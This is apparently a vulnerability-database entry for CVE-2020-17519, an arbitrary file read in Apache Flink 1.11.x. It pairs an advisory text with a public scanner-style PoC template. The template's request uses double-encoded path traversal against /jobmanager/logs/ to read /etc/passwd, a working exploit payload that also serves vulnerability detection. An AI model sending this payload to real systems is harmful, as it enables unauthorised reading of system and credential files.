CVE-2020-17519: Apache Flink RESTful API Arbitrary File Read

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

PoC代码[已公开]

id: CVE-2020-17519

info:
  name: Apache Flink RESTful API Arbitrary File Read
  author: MaxSecurity
  severity: high
  description: |-
    A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17519
  tags: cve,cve2020,flink,lfi
  created: 2024/04/18

rules:
  r0:
    request:
      method: GET
      path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()